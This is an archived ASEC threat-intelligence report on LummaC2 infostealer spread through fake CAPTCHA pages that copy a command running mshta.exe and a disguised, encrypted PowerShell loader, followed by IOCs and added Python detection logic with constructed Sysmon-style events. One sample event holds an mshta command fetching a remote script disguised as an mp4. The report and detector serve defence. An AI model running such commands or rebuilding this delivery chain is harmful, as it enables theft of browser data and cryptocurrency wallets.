Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page - ASEC
By ATCP
Published: 2025-01-07 · Archived: 2026-04-05 18:57:35 UTC

AhnLab SEcurity intelligence Center (ASEC) previously covered, in the blog post below, the DarkGate malware that spreads by prompting users to paste and run a command.

Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V)

In that case, the distribution initially relied on HTML attachments disguised as MS Word files in phishing emails. Recently, however, LummaC2 has been identified spreading through a fake CAPTCHA verification page.

1. Distribution Channel

When the initial distribution page is accessed, a familiar-looking verification screen is displayed, as shown below. Clicking the "I'm not a robot" button copies a command that connects to a malicious URL to the clipboard.

Figure 1. A fake CAPTCHA verification page

The page then presents fake verification instructions that trick the user into running the copied command with keyboard shortcuts.

Figure 2. The code that copies a command to the clipboard

2. Obfuscated HTA File

The command uses the "mshta.exe" process to execute a file (web44.mp4) containing a malicious script from a malicious URL. The file's content has nothing to do with the mp4 extension, and it is obfuscated so that it is not easily recognized as a script. The script can be revealed by extracting the file's strings, but the extracted script is obfuscated as well.

Figure 3. (Left: the original web44.mp4 file / Right: the script revealed by extracting strings from web44.mp4)

3. PowerShell Script Loader

The HTA file ultimately executes a PowerShell script, which is in turn AES-encrypted.

Figure 4. AES-decrypted script

Once decrypted, the PowerShell script downloads and executes an additional PowerShell script (web.png).
Figure 5. The PowerShell script (web.png) executing LummaC2

4. LummaC2

The malware that is ultimately executed is LummaC2, an infostealer capable of stealing information such as browser data and cryptocurrency wallets.

Figure 6. LummaC2 communicating with C2

In the C2 request, "hwid" is the unique identifier of the infected PC, and "pid" is assigned a number from 1 to 3 according to the type of information being stolen. "lid" is presumed to be the Lumma ID and is most likely the campaign identifier of the distributed sample. Detailed information about LummaC2 can be found in the blog post below.

New Infostealer LummaC2 Being Distributed Disguised As Illegal Cracks

In addition, LummaC2 uses a module called ClipBanker, which monitors the clipboard and replaces copied cryptocurrency wallet addresses with the threat actor's wallet address.

Figure 7. ClipBanker

5. Conclusion

LummaC2 distributed through fake CAPTCHA pages is mainly spread via crack program download pages or phishing emails. Users should be especially cautious when dealing with emails or websites of unclear origin.

MD5
3099830291f5dfb199b1f6649997fb45
3734e365ab10e73a85320916ba49c3ee
af46bc7df8441c09296666f0053fb000
e7677ec2ca8706708bcd64b7b8e7111d

URL
https[:]//cc[.]klipjaqemiu[.]shop/web[.]png
https[:]//klipjaqemiu[.]shop/web44[.]mp4
https[:]//noisercluch[.]click/api

Additional IOCs are available on AhnLab TIP.

Source: https://asec.ahnlab.com/en/85699/
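The execution chain in sections 1 to 3 (clipboard command, mshta.exe fetching a script disguised with a media extension, HTA spawning PowerShell) leaves a distinctive pattern in process-creation telemetry. The following detection logic is an added example written for this page, not code from ASEC or the report; it runs over constructed Sysmon Event ID 1 style records, and the hostname example.invalid is a placeholder standing in for the defanged URL above.

```python
import re

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# Extensions mshta.exe has no legitimate reason to fetch from a remote URL; the
# report's loader was served as web44.mp4, the follow-up script as web.png.
DISGUISE_EXTS = {".mp4", ".png", ".jpg", ".gif", ".mp3", ".pdf", ".txt"}

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def _url_ext(url):
    name = url.split("?", 1)[0].split("#", 1)[0].rstrip("/").rsplit("/", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""

def detect(event):
    """Return the reasons an event resembles the fake-CAPTCHA chain ([] if clean).
    event: dict with Image, ParentImage and CommandLine (Sysmon Event ID 1 fields)."""
    reasons = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image == "mshta.exe":
        for url in URL_RE.findall(cmdline):
            reasons.append("mshta launched with remote URL")
            ext = _url_ext(url)
            if ext in DISGUISE_EXTS:
                reasons.append("remote script disguised with %s extension" % ext)
    if image in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe":
        reasons.append("powershell spawned by mshta (HTA-to-PowerShell loader)")
    return reasons

def triage(events):
    """Return [(index, reasons)] for every event that matched at least one rule."""
    hits = []
    for i, event in enumerate(events):
        reasons = detect(event)
        if reasons:
            hits.append((i, reasons))
    return hits

# Constructed sample events (not real telemetry); index 3 is a benign local HTA.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/web44.mp4"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "powershell.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta C:\Program Files\Vendor\setup.hta"},
]
```

Running triage(SAMPLE_EVENTS) flags events 1 and 2 only; a mshta.exe hit whose parent is explorer.exe is consistent with the user having typed the pasted command into the Run dialog, which is worth recording as context in the alert.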